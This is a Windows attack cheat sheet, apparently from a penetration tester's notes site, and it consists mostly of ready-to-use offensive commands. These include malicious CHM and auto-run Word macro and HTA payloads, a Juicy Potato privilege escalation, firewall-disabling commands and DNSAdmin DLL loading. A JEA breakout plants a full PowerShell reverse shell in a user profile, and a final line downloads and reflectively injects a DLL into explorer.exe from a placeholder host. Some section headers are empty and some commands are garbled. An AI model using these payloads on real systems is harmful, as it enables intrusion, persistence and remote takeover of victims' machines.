CHM
Use a Windows VM, install the required tools from here , then get the scricpt Out-CHM.ps1 and create your payload:
Copy Out-CHM -Payload C: \W indows \S ystem32 \s pool \d rivers \c olor \n c.exe -HHCPath "C:\Program Files (x86)\HTML Help Workshop" Juicy Potato
Copy use windows/local/ms16_075_reflection_juicy `
set SESSION <>
set CLSID <> Common CLSIDs for the exploit are:
{e60687f7-01a1-40aa-86ac-db1cbf673334}
{752073A1-23F2-4396-85F0-8FDB879ED0ED}
{3c6859ce-230b-48a4-be6c-932c0c202048}
{F87B28F1-DA9A-4F35-8EC0-800EFCF26B83}
{8F5DF053-3013-4dd8-B5F4-88214E81C0CF}
Word Macro
Simple Word Macro (View > Macros, at the end "File->Information->Check For Issues" to purge personal details), save as .doc:
Copy Sub DoStuff()
Dim wsh As Object
Set wsh = CreateObject("WScript.Shell")
wsh.Run "<powershell command here>"
Set wsh = Nothing
End Sub
Sub AutoOpen()
DoStuff
End Sub Alternativly we can use HTA:
Copy <script language="VBScript">
Function DoStuff()
Dim wsh
Set wsh = CreateObject("Wscript.Shell")
wsh.run "powershell -Sta -Nop -Window Hidden -EncodedCommand <blah>"
Set wsh = Nothing
End Function
DoStuff
self.close
</script> Building and Signing MSIs
Use wix to generate msi files from xml or to manipulate existing msi files. A complete example can be seen in the Ethereal Writeup
Windows Firewall
List rules
Copy netsh advfirewall firewall show rule name=all Disable Firewall on Windows 7 via cmd
Copy Reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f Disable Firewall on Windows 7 via Powershell
Copy powershell.exe -ExecutionPolicy Bypass -command 'Set-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Terminal Server" -Name "fDenyTSConnections" –Value'` Disable Firewall on any windows via cmd
Copy netsh Advfirewall set allprofiles state off Load DLL from System32
Windows 10
RunAs
To run commands with runas, the user has to have logged in at least once.
Tools
Elevate Privileges by loading a custom DLL as DNSAdmin
Copy # requires RSAT
dnscmd < d c > /config /serverlevelplugindll \\ < i p > \< dl l >
# requires RSAT
$dnssettings = Get-DnsServerSetting -ComputerName < dc > -Verbose
$dnssettings.ServerLevelPluginDll = "\\<ip>\<dll>"
Set-DnsServerSetting -InputObject $dnssettings -ComputerName < d c > -Verbose Then restart the service:
Copy sc.exe stop dns
sc.exe start dns DNS Enumeration/Exploitation Tools
Bypass JEA
When in constrained language mode (or more):
Read File:
Write File:
Copy ${C : \file.txt} = 'content' Break out by writing a powershell profile (executed whenever powershell is started by this user):
Copy ${C:\users\<user>\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1} = '$client = New-Object System.Net.Sockets.TCPClient("<ip>",80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()' Via Script Blocks:
Custom function:
Copy PS>function xct { ls } ;
PS>xct
... These vulnerabilities exist only in Constrained Language Mode, usually with JEA "NoLanguage" is to be used.
RCE via Cab Files
Reflectivly load DLL into explorer.exe
Copy String cmd = "$bytes = (New-Object System.Net.WebClient).DownloadData('http://<ip>/payload.dll');(New-Object System.Net.WebClient).DownloadString('http://<ip>/Invoke-ReflectivePEInjection.ps1') | IEX; $procid = (Get-Process -Name explorer).Id; Invoke-ReflectivePEInjection -PEBytes $bytes -ProcId $procid"; Via Invoke-ReflectivePEInjection.ps1 .
Dump Sticky Note Contents
Resources
